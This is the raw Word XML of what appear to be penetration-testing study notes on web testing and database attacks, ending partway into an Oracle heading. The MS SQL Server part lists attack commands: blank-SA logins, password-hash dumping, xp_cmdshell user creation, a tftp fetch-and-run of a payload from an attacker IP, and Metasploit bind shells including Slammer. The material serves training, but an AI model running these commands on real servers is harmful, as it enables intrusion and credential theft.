    <w:p w:rsidR="003D0604" w:rsidRDefault="009750CD" w:rsidP="000734AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">H13a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Common techniques for identifying and reviewing defici</w:t>
      </w:r>
      <w:r>
        <w:t>encies in the areas of security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604" w:rsidP="003D0604">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0604">
        <w:lastRenderedPageBreak/>
        <w:t>Web Testing Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604"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3D0604" w:rsidRPr="005F25BF" w:rsidTr="003D0604">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="583"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I10</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Code Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="009B4D7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Investigate and exploitation of code injection vulnerabilities within web applications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I11</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CRLF Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="000336A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Assessment of web applications for CRLF vulnerabilities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I12</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Application Logic Flaws</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="003D0604"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Assessing the logic flow within an application and the potential for subverting the logic.</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38663A" w:rsidRDefault="0038663A" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>I10 - Code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="0038663A" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="009750CD">
        <w:t xml:space="preserve">10a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0038663A">
        <w:t>Investigate and exploitation of code injection vulnerabilities within web applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00CC2019" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA78FE" w:rsidRPr="00CC2019" w:rsidRDefault="00DA78FE" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The topic of code injection is huge, encompassing dozens of different languages and environments, and a variety of different attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00FE49FF" w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most common web application code injection vulnerabilities include injection into SQL, web scripting languages, SOAP, XML, XPath, email, LDAP and the server operating system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00CC2019" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D06FF" w:rsidRPr="00CC2019" w:rsidRDefault="007D06FF" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web hacker handbook page 237 onwards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>I11 - CRLF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="0038663A" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I11b - </w:t>
      </w:r>
      <w:r w:rsidR="0038663A" w:rsidRPr="0038663A">
        <w:t>Assessment of web applications for CRLF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00CC2019" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1765" w:rsidRPr="00CC2019" w:rsidRDefault="002B1765" w:rsidP="002B1765">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CRLF attacks arise where the Carriage-return (0x0d) and /or Line-feed (0x0a) characters within user controlled data is inserted in an unsafe manner into an HTTP response header by the application. If the attacker can inject CRLF characters into the header he controls, he can insert additional HTTP headers into the response and can write arbitrary content onto the body of the response. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00CC2019" w:rsidRDefault="0038663A" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1765" w:rsidRPr="00CC2019" w:rsidRDefault="002B1765" w:rsidP="0038663A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handbook page </w:t>
      </w:r>
      <w:r w:rsidR="00AC6F04" w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>434-439</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="0038663A" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>I12 - Application Logic Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I12 - </w:t>
      </w:r>
      <w:r w:rsidR="0038663A" w:rsidRPr="0038663A">
        <w:t>Assessing the logic flow within an application and the pot</w:t>
      </w:r>
      <w:r>
        <w:t>ential for subverting the logic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038663A" w:rsidRPr="00CC2019" w:rsidRDefault="0038663A" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRPr="00CC2019" w:rsidRDefault="002B1765" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handbook page 349 onwards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B1765" w:rsidRPr="00CC2019" w:rsidRDefault="002B1765" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1765" w:rsidRPr="00CC2019" w:rsidRDefault="002B1765" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000336A2" w:rsidRPr="00CC2019" w:rsidRDefault="000336A2" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604" w:rsidP="003D0604">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003D0604">
        <w:lastRenderedPageBreak/>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0604" w:rsidRDefault="003D0604"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3D0604" w:rsidRPr="005F25BF" w:rsidTr="00A20836">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="583"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J1</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Microsoft SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="009B4D7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Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.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J2</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Oracle RDBMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="003D0604"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Derivation of version and patch information from hosts running Oracle software.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003D0604" w:rsidRPr="000336A2"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Default Oracle accounts.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J3</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Web / App / Database Connectivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5632" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D0604" w:rsidRPr="003D0604"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Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications.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9750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>J1 - Microsoft SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="00461BC4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009750CD">
        <w:t>Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compr</w:t>
      </w:r>
      <w:r>
        <w:t>omised via database connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00E83629" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00E83629" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83629">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password brute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83629">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>force:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00E83629" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83629">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQLDict.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRPr="00461BC4" w:rsidRDefault="00563B5B" w:rsidP="00461BC4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Blank SA password</w:t>
      </w:r>
      <w:r w:rsidR="00461BC4" w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563B5B" w:rsidRPr="00461BC4" w:rsidRDefault="00D32669"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sqsh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -S </w:t>
      </w:r>
      <w:r w:rsidR="00461BC4" w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -U sa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D32669"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osql</w:t>
      </w:r>
      <w:r w:rsidR="00E83629">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –S &lt;ip&gt;/&lt;instance&gt; -U </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –P ""</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Version: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select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> @@version;</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Hashes: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SELECT name, password FROM master</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>..sysxlogins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(2000)</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SELECT name, password_hash FROM master.sys.sql_logins</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2005</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</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Command Execution: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BC4" w:rsidRPr="00461BC4" w:rsidRDefault="009021DD" w:rsidP="00461BC4">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EXEC xp_cmdshell 'net user test</w:t>
      </w:r>
      <w:r w:rsidR="00461BC4" w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password1 /add';</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Re-Enabling cmdshell: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sp_configure 'show advanced options', 1;</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RECONFIGURE;</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sp_configure 'xp_cmdshell', 1;</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RECONFIGURE;</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a Shell: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xp_cmdshell 'tftp -i &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; get mt.exe %TEMP%\mt.exe';</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xp_cmdshell '%TEMP%\mt.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461BC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=&lt;ip&gt; E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0246" w:rsidRDefault="009C0246" w:rsidP="009C0246">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C0246" w:rsidRPr="009C0246" w:rsidRDefault="009C0246" w:rsidP="009C0246">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Slammer (MS02-039):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0246" w:rsidRPr="00461BC4" w:rsidRDefault="009C0246"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9C0246">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql/ms02_039_slammer RHOST=&lt;IP&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0246">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PAYLOAD=windows/shell/bind_tcp E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009750CD" w:rsidRDefault="009750CD" w:rsidP="009750CD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>J2 - Oracle RDBMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83629" w:rsidRPr="00916119" w:rsidRDefault="00E83629" w:rsidP="00E83629">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
